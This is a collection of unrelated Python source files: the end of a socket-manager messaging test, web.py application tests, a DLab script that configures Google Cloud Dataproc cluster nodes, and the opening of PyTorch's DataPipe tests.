        manager_message_id = 'message_id_from_manager'
        test_message_text_2 = 'test_message_text_2'
        message_send_packet = Packet(
            manager_message_id,
            data_model.MESSAGE_BATCH,
            self.socket_manager.get_my_sender_id(),
            TEST_WORKER_ID_1,
            TEST_ASSIGNMENT_ID_1,
            test_message_text_2,
            't2',
        )
        self.socket_manager.queue_packet(message_send_packet)
        self.assertEqualBy(lambda: message_packet is None, False, 8)
        self.assertEqual(message_packet.id, manager_message_id)
        self.assertEqual(message_packet.data, test_message_text_2)
        self.assertIn(manager_message_id, self.socket_manager.packet_map)

        # Test agent disconnect
        self.agent1.send_disconnect()
        self.assertEqualBy(lambda: self.dead_worker_id, TEST_WORKER_ID_1, 8)
        self.assertEqual(self.dead_assignment_id, TEST_ASSIGNMENT_ID_1)

    def test_one_agent_disconnect_other_alive(self):
        """One agent's disconnect must not disturb messaging for the other."""
        message_packet = None

        def on_msg(*args):
            nonlocal message_packet
            message_packet = args[0]

        self.agent1.register_to_socket(self.fake_socket, on_msg)
        self.agent2.register_to_socket(self.fake_socket, on_msg)
        self.assertIsNone(message_packet)

        # Assert alive is registered
        self.agent1.send_alive()
        self.agent2.send_alive()
        self.assertIsNone(message_packet)

        # Kill second agent
        self.agent2.send_disconnect()
        self.assertEqualBy(lambda: self.dead_worker_id, TEST_WORKER_ID_2, 8)
        self.assertEqual(self.dead_assignment_id, TEST_ASSIGNMENT_ID_2)

        # Run rest of tests
        # Test message send from agent
        test_message_text_1 = 'test_message_text_1'
        msg_id = self.agent1.send_message(test_message_text_1)
        self.assertEqualBy(lambda: self.message_packet is None, False, 8)
        self.assertEqual(self.message_packet.id, msg_id)
        self.assertEqual(self.message_packet.data['text'], test_message_text_1)

        # Test message send to agent
        manager_message_id = 'message_id_from_manager'
        test_message_text_2 = 'test_message_text_2'
        message_send_packet = Packet(
            manager_message_id,
            data_model.WORLD_MESSAGE,
            self.socket_manager.get_my_sender_id(),
            TEST_WORKER_ID_1,
            TEST_ASSIGNMENT_ID_1,
            test_message_text_2,
            't2',
        )
        self.socket_manager.queue_packet(message_send_packet)
        self.assertEqualBy(lambda: message_packet is None, False, 8)
        self.assertEqual(message_packet.id, manager_message_id)
        self.assertEqual(message_packet.data, test_message_text_2)
        self.assertIn(manager_message_id, self.socket_manager.packet_map)

        # Test agent disconnect
        self.agent1.send_disconnect()
        self.assertEqualBy(lambda: self.dead_worker_id, TEST_WORKER_ID_1, 8)
        self.assertEqual(self.dead_assignment_id, TEST_ASSIGNMENT_ID_1)
if __name__ == '__main__':
    # buffer=True captures stdout/stderr per test and only shows it on failure
    unittest.main(buffer=True)
|
test_application.py
|
import os
import shutil
import sys
import threading
import time
import unittest
import web
try:
    from urllib.parse import urlencode  # Python 3
except ImportError:
    from urllib import urlencode  # Python 2 fallback
data = """
import web
urls = ("/", "%(classname)s")
app = web.application(urls, globals(), autoreload=True)
class %(classname)s:
def GET(self):
return "%(output)s"
"""
# Module-level app used by ApplicationTest.testIter to exercise generator
# (iterable) response bodies.
urls = ("/iter", "do_iter")
app = web.application(urls, globals())
class do_iter:
    """Handler that produces its response body lazily as a generator."""

    def GET(self):
        # web.py iterates the generator to assemble the response body.
        greeting = "hello, "
        yield greeting
        yield web.input(name="world").name

    # POST behaves exactly like GET for this endpoint.
    POST = GET
def write(filename, data):
    """Write *data* to *filename*, replacing any existing content.

    Uses a context manager so the file handle is closed even if the write
    raises; the original open/write/close sequence leaked the handle on
    error.
    """
    with open(filename, "w") as f:
        f.write(data)
class ApplicationTest(unittest.TestCase):
    """
    Tests for web.py's application object: the autoreloader, URL routing,
    sub-applications, subdomains, redirects, processors/hooks, input
    decoding, notfound handling, and the built-in HTTP server lifecycle.
    """

    def test_reloader(self):
        """The autoreloader should pick up both body and URL-map changes."""
        write("foo.py", data % dict(classname="a", output="a"))
        import foo

        app = foo.app

        self.assertEqual(app.request("/").data, b"a")

        # test class change
        time.sleep(1)  # ensure the file mtime actually advances
        write("foo.py", data % dict(classname="a", output="b"))
        self.assertEqual(app.request("/").data, b"b")

        # test urls change
        time.sleep(1)
        write("foo.py", data % dict(classname="c", output="c"))
        self.assertEqual(app.request("/").data, b"c")

    def test_reloader_nested(self):
        """Same as test_reloader, but for a module inside a package."""
        try:
            shutil.rmtree("testpackage")
        except OSError:
            pass  # directory did not exist yet

        os.mkdir("testpackage")
        write("testpackage/__init__.py", "")
        write("testpackage/bar.py", data % dict(classname="a", output="a"))
        import testpackage.bar

        app = testpackage.bar.app
        self.assertEqual(app.request("/").data, b"a")

        # test class change
        time.sleep(1)
        write("testpackage/bar.py", data % dict(classname="a", output="b"))
        self.assertEqual(app.request("/").data, b"b")

        # test urls change
        time.sleep(1)
        write("testpackage/bar.py", data % dict(classname="c", output="c"))
        self.assertEqual(app.request("/").data, b"c")

    def testUppercaseMethods(self):
        """Only uppercase method names are routable as HTTP methods."""
        urls = ("/", "hello")
        app = web.application(urls, locals())

        class hello:
            def GET(self):
                return "hello"

            def internal(self):
                return "secret"

        # A lowercase method must not be reachable over HTTP.
        response = app.request("/", method="internal")
        self.assertEqual(response.status, "405 Method Not Allowed")

    def testRedirect(self):
        """String targets of the form 'redirect <path>' issue 301s,
        preserving query strings and regex captures."""
        # fmt: off
        urls = (
            "/a", "redirect /hello/",
            "/b/(.*)", r"redirect /hello/\1",
            "/hello/(.*)", "hello"
        )
        # fmt: on
        app = web.application(urls, locals())

        class hello:
            def GET(self, name):
                name = name or "world"
                return "hello " + name

        response = app.request("/a")
        self.assertEqual(response.status, "301 Moved Permanently")
        self.assertEqual(response.headers["Location"], "http://0.0.0.0:8080/hello/")

        # Query string must be carried through the redirect.
        response = app.request("/a?x=2")
        self.assertEqual(response.status, "301 Moved Permanently")
        self.assertEqual(response.headers["Location"], "http://0.0.0.0:8080/hello/?x=2")

        # Captured group \1 must be substituted into the target.
        response = app.request("/b/foo?x=2")
        self.assertEqual(response.status, "301 Moved Permanently")
        self.assertEqual(
            response.headers["Location"], "http://0.0.0.0:8080/hello/foo?x=2"
        )

    def test_routing(self):
        """Routing matches the full path exactly (no trailing newline)."""
        urls = ("/foo", "foo")

        class foo:
            def GET(self):
                return "foo"

        app = web.application(urls, {"foo": foo})
        self.assertEqual(app.request("/foo\n").data, b"not found")
        self.assertEqual(app.request("/foo").data, b"foo")

    def test_subdirs(self):
        """A sub-application mounted at /blog handles paths beneath it."""
        urls = ("/(.*)", "blog")

        class blog:
            def GET(self, path):
                return "blog " + path

        app_blog = web.application(urls, locals())

        # fmt: off
        urls = (
            "/blog", app_blog,
            "/(.*)", "index"
        )
        # fmt: on

        class index:
            def GET(self, path):
                return "hello " + path

        app = web.application(urls, locals())

        self.assertEqual(app.request("/blog/foo").data, b"blog foo")
        self.assertEqual(app.request("/foo").data, b"hello foo")

        # A processor added on the outer app also wraps sub-app requests.
        def processor(handler):
            return web.ctx.path + ":" + handler()

        app.add_processor(processor)
        self.assertEqual(app.request("/blog/foo").data, b"/blog/foo:blog foo")

    def test_subdomains(self):
        """subdomain_application dispatches on the Host header, with regex
        fallbacks."""

        def create_app(name):
            urls = ("/", "index")

            class index:
                def GET(self):
                    return name

            return web.application(urls, locals())

        # fmt: off
        urls = (
            "a.example.com", create_app('a'),
            "b.example.com", create_app('b'),
            ".*.example.com", create_app('*')
        )
        # fmt: on
        app = web.subdomain_application(urls, locals())

        def test(host, expected_result):
            result = app.request("/", host=host)
            self.assertEqual(result.data, expected_result)

        test("a.example.com", b"a")
        test("b.example.com", b"b")
        test("c.example.com", b"*")
        test("d.example.com", b"*")

    def test_redirect(self):
        """seeother from inside a sub-app respects absolute=True and
        SCRIPT_NAME prefixes."""
        urls = ("/(.*)", "blog")

        class blog:
            def GET(self, path):
                if path == "foo":
                    raise web.seeother("/login", absolute=True)
                else:
                    raise web.seeother("/bar")

        app_blog = web.application(urls, locals())

        # fmt: off
        urls = (
            "/blog", app_blog,
            "/(.*)", "index"
        )
        # fmt: on

        class index:
            def GET(self, path):
                return "hello " + path

        app = web.application(urls, locals())

        response = app.request("/blog/foo")
        self.assertEqual(response.headers["Location"], "http://0.0.0.0:8080/login")

        response = app.request("/blog/foo", env={"SCRIPT_NAME": "/x"})
        self.assertEqual(response.headers["Location"], "http://0.0.0.0:8080/x/login")

        # Relative seeother resolves against the sub-app mount point.
        response = app.request("/blog/foo2")
        self.assertEqual(response.headers["Location"], "http://0.0.0.0:8080/blog/bar")

        response = app.request("/blog/foo2", env={"SCRIPT_NAME": "/x"})
        self.assertEqual(response.headers["Location"], "http://0.0.0.0:8080/x/blog/bar")

    def test_processors(self):
        """Loadhooks fire on the app that handles the request; outer-app
        hooks fire for sub-app requests too."""
        urls = ("/(.*)", "blog")

        class blog:
            def GET(self, path):
                return "blog " + path

        # x counts sub-app loads, y counts outer-app loads.
        state = web.storage(x=0, y=0)

        def f():
            state.x += 1

        app_blog = web.application(urls, locals())
        app_blog.add_processor(web.loadhook(f))

        # fmt: off
        urls = (
            "/blog", app_blog,
            "/(.*)", "index"
        )
        # fmt: on

        class index:
            def GET(self, path):
                return "hello " + path

        app = web.application(urls, locals())

        def g():
            state.y += 1

        app.add_processor(web.loadhook(g))

        app.request("/blog/foo")
        assert state.x == 1 and state.y == 1, repr(state)
        app.request("/foo")
        assert state.x == 1 and state.y == 2, repr(state)

    def testUnicodeInput(self):
        """web.input decodes UTF-8 query strings, form posts, and multipart
        file uploads."""
        urls = ("(/.*)", "foo")

        class foo:
            def GET(self, path):
                i = web.input(name="")
                return repr(i.name)

            def POST(self, path):
                if path == "/multipart":
                    i = web.input(file={})
                    return i.file.value
                else:
                    i = web.input()
                    return repr(dict(i)).replace("u", "")

        app = web.application(urls, locals())

        def f(name):
            path = "/?" + urlencode({"name": name.encode("utf-8")})
            self.assertEqual(app.request(path).data.decode("utf-8"), repr(name))

        f(u"\u1234")
        f(u"foo")

        response = app.request("/", method="POST", data=dict(name="foo"))
        self.assertEqual(response.data, b"{'name': 'foo'}")

        # NOTE: this local `data` shadows the module-level template string.
        data = '--boundary\r\nContent-Disposition: form-data; name="x"\r\n\r\nfoo\r\n--boundary\r\nContent-Disposition: form-data; name="file"; filename="a.txt"\r\nContent-Type: text/plain\r\n\r\na\r\n--boundary--\r\n'
        headers = {"Content-Type": "multipart/form-data; boundary=boundary"}
        response = app.request("/multipart", method="POST", data=data, headers=headers)
        self.assertEqual(response.data, b"a")

    def testCustomNotFound(self):
        """A sub-app's custom notfound wins over the outer app's."""
        urls_a = ("/", "a")
        urls_b = ("/", "b")

        app_a = web.application(urls_a, locals())
        app_b = web.application(urls_b, locals())

        app_a.notfound = lambda: web.HTTPError("404 Not Found", {}, "not found 1")

        # fmt: off
        urls = (
            "/a", app_a,
            "/b", app_b
        )
        # fmt: on
        app = web.application(urls, locals())

        def assert_notfound(path, message):
            response = app.request(path)
            self.assertEqual(response.status.split()[0], "404")
            self.assertEqual(response.data, message)

        assert_notfound("/a/foo", b"not found 1")
        assert_notfound("/b/foo", b"not found")

        # Outer-app notfound applies only to sub-apps without their own.
        app.notfound = lambda: web.HTTPError("404 Not Found", {}, "not found 2")
        assert_notfound("/a/foo", b"not found 1")
        assert_notfound("/b/foo", b"not found 2")

    def testIter(self):
        """Generator response bodies are concatenated for GET and POST."""
        self.assertEqual(app.request("/iter").data, b"hello, world")
        self.assertEqual(app.request("/iter?name=web").data, b"hello, web")

        self.assertEqual(app.request("/iter", method="POST").data, b"hello, world")
        self.assertEqual(
            app.request("/iter", method="POST", data="name=web").data, b"hello, web"
        )

    def testUnload(self):
        """Unloadhooks run after every request, including notfound ones."""
        x = web.storage(a=0)

        # fmt: off
        urls = (
            "/foo", "foo",
            "/bar", "bar"
        )
        # fmt: on

        class foo:
            def GET(self):
                return "foo"

        class bar:
            def GET(self):
                raise web.notfound()

        app = web.application(urls, locals())

        def unload():
            x.a += 1

        app.add_processor(web.unloadhook(unload))

        app.request("/foo")
        self.assertEqual(x.a, 1)

        app.request("/bar")
        self.assertEqual(x.a, 2)

    def test_changequery(self):
        """changequery overrides one query parameter, keeping the rest."""
        urls = ("/", "index")

        class index:
            def GET(self):
                return web.changequery(x=1)

        app = web.application(urls, locals())

        def f(path):
            return app.request(path).data

        self.assertEqual(f("/?x=2"), b"/?x=1")
        # Parameter ordering in the rebuilt query string is not guaranteed.
        p = f("/?y=1&y=2&x=2")
        self.assertTrue(p == b"/?y=1&y=2&x=1" or p == b"/?x=1&y=1&y=2")

    def test_setcookie(self):
        """Cookie Path defaults to the app's mount point (SCRIPT_NAME)."""
        urls = ("/", "index")

        class index:
            def GET(self):
                web.setcookie("foo", "bar")
                return "hello"

        app = web.application(urls, locals())

        def f(script_name=""):
            response = app.request("/", env={"SCRIPT_NAME": script_name})
            return response.headers["Set-Cookie"]

        self.assertEqual(f(""), "foo=bar; Path=/")
        self.assertEqual(f("/admin"), "foo=bar; Path=/admin/")

    def test_stopsimpleserver(self):
        """app.stop() terminates the built-in HTTP server thread."""
        urls = ("/", "index")

        class index:
            def GET(self):
                pass

        # reset command-line arguments
        sys.argv = ["code.py"]
        app = web.application(urls, locals())
        thread = threading.Thread(target=app.run)

        thread.start()
        time.sleep(1)  # give the server time to start listening
        self.assertTrue(thread.is_alive())

        app.stop()
        thread.join(timeout=1)
        self.assertFalse(thread.is_alive())
|
dataengine-service_configure.py
|
#!/usr/bin/python
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import json
import time
from fabric.api import *
from dlab.fab import *
from dlab.meta_lib import *
from dlab.actions_lib import *
from dlab.notebook_lib import *
import sys
import os
import logging
import multiprocessing
def configure_dataengine_service(instance, dataproc_conf):
    """Configure a single Dataproc cluster node.

    Three phases, each fatal on failure (the whole Dataproc cluster is deleted
    and the process exits non-zero so the parent can see a bad exitcode):
      1. point the node's HTTP proxy at the edge instance,
      2. install pip/python packages over SSH (fabric),
      3. register the node in the edge reverse-proxy template.

    Runs once per cluster instance, driven by multiprocessing in __main__.
    NOTE(review): mutates the shared fabric `env` (host_string/key) — assumes
    one fabric context per process; confirm this is only called from child
    processes.
    """
    dataproc_conf['instance_ip'] = meta_lib.GCPMeta().get_private_ip_address(instance)
    # configuring proxy on Data Engine service
    try:
        logging.info('[CONFIGURE PROXY ON DATAENGINE SERVICE]')
        print('[CONFIGURE PROXY ON DATAENGINE SERVICE]')
        additional_config = {"proxy_host": dataproc_conf['edge_instance_name'], "proxy_port": "3128"}
        params = "--hostname {} --instance_name {} --keyfile {} --additional_config '{}' --os_user {}"\
            .format(dataproc_conf['instance_ip'], dataproc_conf['cluster_name'], dataproc_conf['key_path'],
                    json.dumps(additional_config), dataproc_conf['dlab_ssh_user'])
        try:
            local("~/scripts/{}.py {}".format('common_configure_proxy', params))
        except:
            traceback.print_exc()
            raise Exception
    except Exception as err:
        print('Error: {0}'.format(err))
        append_result("Failed to configure proxy.", str(err))
        # Roll back: a half-configured cluster is useless, so delete it.
        actions_lib.GCPActions().delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
        sys.exit(1)
    try:
        logging.info('[CONFIGURE DATAENGINE SERVICE]')
        print('[CONFIGURE DATAENGINE SERVICE]')
        try:
            # Point fabric at this node for the SSH-based package installation.
            env['connection_attempts'] = 100
            env.key_filename = "{}".format(dataproc_conf['key_path'])
            env.host_string = dataproc_conf['dlab_ssh_user'] + '@' + dataproc_conf['instance_ip']
            install_os_pkg(['python-pip', 'python3-pip'])
            configure_data_engine_service_pip(dataproc_conf['instance_ip'], dataproc_conf['dlab_ssh_user'],
                                              dataproc_conf['key_path'])
        except:
            traceback.print_exc()
            raise Exception
    except Exception as err:
        print('Error: {0}'.format(err))
        append_result("Failed to configure dataengine service.", str(err))
        actions_lib.GCPActions().delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
        sys.exit(1)
    try:
        print('[SETUP EDGE REVERSE PROXY TEMPLATE]')
        logging.info('[SETUP EDGE REVERSE PROXY TEMPLATE]')
        # Build the datanode list (name/ip/dns per worker) for the proxy template.
        slaves = []
        for idx, instance in enumerate(dataproc_conf['cluster_core_instances']):
            slave_ip = meta_lib.GCPMeta().get_private_ip_address(instance)
            slave = {
                'name': 'datanode{}'.format(idx + 1),
                'ip': slave_ip,
                'dns': "{0}.c.{1}.internal".format(instance, os.environ['gcp_project_id'])
            }
            slaves.append(slave)
        additional_info = {
            "computational_name": dataproc_conf['computational_name'],
            "master_ip": dataproc_conf['master_ip'],
            "master_dns": "{0}.c.{1}.internal".format(dataproc_conf['master_name'], os.environ['gcp_project_id']),
            "slaves": slaves,
            "tensor": False
        }
        params = "--edge_hostname {} " \
                 "--keyfile {} " \
                 "--os_user {} " \
                 "--type {} " \
                 "--exploratory_name {} " \
                 "--additional_info '{}'"\
            .format(dataproc_conf['edge_instance_hostname'],
                    dataproc_conf['key_path'],
                    dataproc_conf['dlab_ssh_user'],
                    'dataengine-service',
                    dataproc_conf['exploratory_name'],
                    json.dumps(additional_info))
        try:
            local("~/scripts/{}.py {}".format('common_configure_reverse_proxy', params))
        except:
            append_result("Failed edge reverse proxy template")
            raise Exception
    except Exception as err:
        print('Error: {0}'.format(err))
        append_result("Failed to configure reverse proxy.", str(err))
        actions_lib.GCPActions().delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
        sys.exit(1)
if __name__ == "__main__":
    # Per-request log file under /logs/<resource>/.
    local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['project_name'],
                                               os.environ['request_id'])
    local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
    logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
                        level=logging.INFO,
                        filename=local_log_filepath)
    print('Generating infrastructure names and tags')
    # Derive every GCP resource name from environment variables supplied by the
    # provisioning service; names are lowercased with '_' -> '-' to satisfy
    # GCP naming rules.
    dataproc_conf = dict()
    try:
        dataproc_conf['exploratory_name'] = (os.environ['exploratory_name']).lower().replace('_', '-')
    except:
        dataproc_conf['exploratory_name'] = ''
    try:
        dataproc_conf['computational_name'] = (os.environ['computational_name']).lower().replace('_', '-')
    except:
        dataproc_conf['computational_name'] = ''
    dataproc_conf['service_base_name'] = (os.environ['conf_service_base_name']).lower().replace('_', '-')
    dataproc_conf['edge_user_name'] = (os.environ['edge_user_name']).lower().replace('_', '-')
    dataproc_conf['project_name'] = (os.environ['project_name']).lower().replace('_', '-')
    dataproc_conf['endpoint_name'] = (os.environ['endpoint_name']).lower().replace('_', '-')
    dataproc_conf['key_name'] = os.environ['conf_key_name']
    dataproc_conf['key_path'] = '{0}{1}.pem'.format(os.environ['conf_key_dir'], os.environ['conf_key_name'])
    dataproc_conf['region'] = os.environ['gcp_region']
    dataproc_conf['zone'] = os.environ['gcp_zone']
    dataproc_conf['subnet'] = '{0}-{1}-subnet'.format(dataproc_conf['service_base_name'],
                                                      dataproc_conf['project_name'])
    dataproc_conf['cluster_name'] = '{0}-{1}-des-{2}-{3}'.format(dataproc_conf['service_base_name'],
                                                                 dataproc_conf['project_name'],
                                                                 dataproc_conf['exploratory_name'],
                                                                 dataproc_conf['computational_name'])
    dataproc_conf['cluster_tag'] = '{0}-{1}-ps'.format(dataproc_conf['service_base_name'],
                                                       dataproc_conf['project_name'])
    dataproc_conf['bucket_name'] = '{0}-{1}-{2}-bucket'.format(dataproc_conf['service_base_name'],
                                                               dataproc_conf['project_name'],
                                                               dataproc_conf['endpoint_name'])
    dataproc_conf['release_label'] = os.environ['dataproc_version']
    dataproc_conf['cluster_label'] = {os.environ['notebook_instance_name']: "not-configured"}
    dataproc_conf['dataproc_service_account_name'] = '{0}-{1}-ps'.format(dataproc_conf['service_base_name'],
                                                                         dataproc_conf['project_name'])
    service_account_email = "{}@{}.iam.gserviceaccount.com".format(dataproc_conf['dataproc_service_account_name'],
                                                                   os.environ['gcp_project_id'])
    dataproc_conf['edge_instance_name'] = '{0}-{1}-{2}-edge'.format(dataproc_conf['service_base_name'],
                                                                    dataproc_conf['project_name'],
                                                                    dataproc_conf['endpoint_name'])
    dataproc_conf['edge_instance_hostname'] = GCPMeta().get_instance_public_ip_by_name(
        dataproc_conf['edge_instance_name'])
    dataproc_conf['dlab_ssh_user'] = os.environ['conf_os_user']
    # Dataproc names the master node "<cluster>-m" and workers "<cluster>-w-<n>".
    dataproc_conf['master_name'] = dataproc_conf['cluster_name'] + '-m'
    dataproc_conf['master_ip'] = meta_lib.GCPMeta().get_private_ip_address(dataproc_conf['master_name'])
    try:
        res = meta_lib.GCPMeta().get_list_instances(os.environ['gcp_zone'], dataproc_conf['cluster_name'])
        dataproc_conf['cluster_instances'] = [i.get('name') for i in res['items']]
    except Exception as err:
        traceback.print_exc()
        raise Exception
    # Workers only (instances whose name contains "<cluster>-w-").
    dataproc_conf['cluster_core_instances'] = list()
    for instance in dataproc_conf['cluster_instances']:
        if "{}-w-".format(dataproc_conf['cluster_name']) in instance:
            dataproc_conf['cluster_core_instances'].append(instance)
    # Configure all cluster nodes in parallel; a non-zero exitcode from any
    # child marks the whole provisioning run as failed.
    try:
        jobs = []
        for instance in dataproc_conf['cluster_instances']:
            p = multiprocessing.Process(target=configure_dataengine_service, args=(instance, dataproc_conf))
            jobs.append(p)
            p.start()
        for job in jobs:
            job.join()
        for job in jobs:
            if job.exitcode != 0:
                raise Exception
    except:
        traceback.print_exc()
        raise Exception
    # Emit a human-readable summary plus the machine-readable /root/result.json
    # consumed by the provisioning service.
    try:
        dataproc_master_acces_url = "http://" + dataproc_conf['edge_instance_hostname'] + "/{}/".format(
            dataproc_conf['exploratory_name'] + '_' + dataproc_conf['computational_name'])
        logging.info('[SUMMARY]')
        print('[SUMMARY]')
        print("Service base name: {}".format(dataproc_conf['service_base_name']))
        print("Cluster name: {}".format(dataproc_conf['cluster_name']))
        print("Key name: {}".format(dataproc_conf['key_name']))
        print("Region: {}".format(dataproc_conf['region']))
        print("Zone: {}".format(dataproc_conf['zone']))
        print("Subnet: {}".format(dataproc_conf['subnet']))
        print("Dataproc version: {}".format(dataproc_conf['release_label']))
        print("Dataproc master node shape: {}".format(os.environ['dataproc_master_instance_type']))
        print("Dataproc slave node shape: {}".format(os.environ['dataproc_slave_instance_type']))
        print("Master count: {}".format(os.environ['dataproc_master_count']))
        print("Slave count: {}".format(os.environ['dataproc_slave_count']))
        print("Preemptible count: {}".format(os.environ['dataproc_preemptible_count']))
        print("Notebook hostname: {}".format(os.environ['notebook_instance_name']))
        print("Bucket name: {}".format(dataproc_conf['bucket_name']))
        with open("/root/result.json", 'w') as result:
            res = {"hostname": dataproc_conf['cluster_name'],
                   "key_name": dataproc_conf['key_name'],
                   "instance_id": dataproc_conf['cluster_name'],
                   "user_own_bucket_name": dataproc_conf['bucket_name'],
                   "Action": "Create new Dataproc cluster",
                   "computational_url": [
                       {"description": "Dataproc Master",
                        "url": dataproc_master_acces_url}
                   ]
                   }
            print(json.dumps(res))
            result.write(json.dumps(res))
    except:
        print("Failed writing results.")
        sys.exit(1)
|
test_datapipe.py
|
# Owner(s): ["module: dataloader"]
import copy
import http.server
import itertools
import os
import os.path
import pickle
import random
import socketserver
import sys
import tarfile
import tempfile
import threading
import time
import unittest
import warnings
import zipfile
from functools import partial
from typing import (
Any,
Awaitable,
Dict,
Generic,
Iterator,
List,
NamedTuple,
Optional,
Set,
Tuple,
Type,
TypeVar,
Union,
)
from unittest import skipIf
import numpy as np
import torch
import torch.utils.data.backward_compatibility
import torch.utils.data.datapipes as dp
import torch.utils.data.graph
import torch.utils.data.sharding
from torch.testing._internal.common_utils import TestCase, run_tests, suppress_warnings
from torch.utils.data import (
DataLoader,
DataChunk,
IterDataPipe,
MapDataPipe,
RandomSampler,
argument_validation,
runtime_validation,
runtime_validation_disabled,
)
from torch.utils.data.graph import traverse
from torch.utils.data.datapipes.utils.decoder import (
basichandlers as decoder_basichandlers,
)
# Optional-dependency probes: tests needing dill or pandas are skipped when absent.
try:
    import dill
    # XXX: By default, dill writes the Pickler dispatch table to inject its
    # own logic there. This globally affects the behavior of the standard library
    # pickler for any user who transitively depends on this module!
    # Undo this extension to avoid altering the behavior of the pickler globally.
    dill.extend(use_dill=False)
    HAS_DILL = True
except ImportError:
    HAS_DILL = False
skipIfNoDill = skipIf(not HAS_DILL, "no dill")
try:
    import pandas  # type: ignore[import] # noqa: F401 F403
    HAS_PANDAS = True
except ImportError:
    HAS_PANDAS = False
skipIfNoDataFrames = skipIf(not HAS_PANDAS, "no dataframes (pandas)")
# Generic (covariant) element type used by DataPipe helpers below.
T_co = TypeVar("T_co", covariant=True)
def create_temp_dir_and_files():
    """Build a temp directory tree used as a test fixture.

    Layout: a top-level directory with a .txt file ('0123456789abcdef'),
    a .byte file (b'0123456789abcdef') and an empty .empty file, plus one
    subdirectory containing a .txt and a .byte file with the same payloads.

    Returns:
        [(top_dir, txt, byte, empty), (sub_dir, sub_txt, sub_byte)] — the
        TemporaryDirectory handles are released/deleted in tearDown().
    """
    def _new_file(dir_path, suffix, payload=None):
        # Create one named file under dir_path; optionally fill it with payload.
        with tempfile.NamedTemporaryFile(dir=dir_path, delete=False, suffix=suffix) as handle:
            name = handle.name
        if payload is not None:
            with open(name, 'wb' if isinstance(payload, bytes) else 'w') as out:
                out.write(payload)
        return name

    temp_dir = tempfile.TemporaryDirectory()  # noqa: P201
    top_path = temp_dir.name
    temp_file1_name = _new_file(top_path, '.txt', '0123456789abcdef')
    temp_file2_name = _new_file(top_path, '.byte', b"0123456789abcdef")
    temp_file3_name = _new_file(top_path, '.empty')
    temp_sub_dir = tempfile.TemporaryDirectory(dir=top_path)  # noqa: P201
    sub_path = temp_sub_dir.name
    temp_sub_file1_name = _new_file(sub_path, '.txt', '0123456789abcdef')
    temp_sub_file2_name = _new_file(sub_path, '.byte', b"0123456789abcdef")
    return [(temp_dir, temp_file1_name, temp_file2_name, temp_file3_name),
            (temp_sub_dir, temp_sub_file1_name, temp_sub_file2_name)]
# Given a DataPipe and integer n, iterate the DataPipe for n elements and store the elements into a list
# Then, reset the DataPipe and return a tuple of two lists
# 1. A list of elements yielded before the reset
# 2. A list of all elements of the DataPipe after the reset
def reset_after_n_next_calls(datapipe: Union[IterDataPipe[T_co], MapDataPipe[T_co]],
                             n: int) -> Tuple[List[T_co], List[T_co]]:
    iterator = iter(datapipe)
    partial_output = [next(iterator) for _ in range(n)]
    # Re-iterating the pipe from scratch implicitly resets it.
    return partial_output, list(datapipe)
def odd_or_even(x: int) -> int:
    """Return the parity of *x*: 0 for even values, 1 for odd values."""
    return 1 if x % 2 else 0
class TestDataChunk(TestCase):
    """DataChunk should behave like the list it wraps (indexing, iteration,
    len, str) and remain a DataChunk through in-place list operations
    (sort, reverse, random.shuffle)."""
    def setUp(self):
        # A shuffled copy of 0..9 backs every test.
        self.elements = list(range(10))
        random.shuffle(self.elements)
        self.chunk: DataChunk[int] = DataChunk(self.elements)
    def test_getitem(self):
        for i in range(10):
            self.assertEqual(self.elements[i], self.chunk[i])
    def test_iter(self):
        for ele, dc in zip(self.elements, iter(self.chunk)):
            self.assertEqual(ele, dc)
    def test_len(self):
        self.assertEqual(len(self.elements), len(self.chunk))
    def test_as_string(self):
        # str() must match the plain list's str(), also when nested in a batch.
        self.assertEqual(str(self.chunk), str(self.elements))
        batch = [self.elements] * 3
        chunks: List[DataChunk[int]] = [DataChunk(self.elements)] * 3
        self.assertEqual(str(batch), str(chunks))
    def test_sort(self):
        chunk: DataChunk[int] = DataChunk(self.elements)
        chunk.sort()
        # In-place sort must preserve the DataChunk type.
        self.assertTrue(isinstance(chunk, DataChunk))
        for i, d in enumerate(chunk):
            self.assertEqual(i, d)
    def test_reverse(self):
        chunk: DataChunk[int] = DataChunk(self.elements)
        chunk.reverse()
        self.assertTrue(isinstance(chunk, DataChunk))
        for i in range(10):
            self.assertEqual(chunk[i], self.elements[9 - i])
    def test_random_shuffle(self):
        # Same seed => random.shuffle permutes DataChunk and list identically.
        elements = list(range(10))
        chunk: DataChunk[int] = DataChunk(elements)
        rng = random.Random(0)
        rng.shuffle(chunk)
        rng = random.Random(0)
        rng.shuffle(elements)
        self.assertEqual(chunk, elements)
class TestIterableDataPipeBasic(TestCase):
    """End-to-end checks of the basic Iter-DataPipes (FileLister, FileLoader,
    Tar/Zip archive readers, RoutedDecoder, Grouper, demux/mux, Mapper)
    against a real temp-directory fixture created in setUp()."""
    def setUp(self):
        ret = create_temp_dir_and_files()
        self.temp_dir = ret[0][0]
        self.temp_files = ret[0][1:]
        self.temp_sub_dir = ret[1][0]
        self.temp_sub_files = ret[1][1:]
    def tearDown(self):
        try:
            self.temp_sub_dir.cleanup()
            self.temp_dir.cleanup()
        except Exception as e:
            warnings.warn("TestIterableDatasetBasic was not able to cleanup temp dir due to {}".format(str(e)))
    def test_listdirfiles_iterable_datapipe(self):
        """FileLister yields exactly the fixture files; recursive=True adds the subdir's."""
        temp_dir = self.temp_dir.name
        datapipe = dp.iter.FileLister(temp_dir, '')
        count = 0
        for pathname in datapipe:
            count = count + 1
            self.assertTrue(pathname in self.temp_files)
        self.assertEqual(count, len(self.temp_files))
        count = 0
        datapipe = dp.iter.FileLister(temp_dir, '', recursive=True)
        for pathname in datapipe:
            count = count + 1
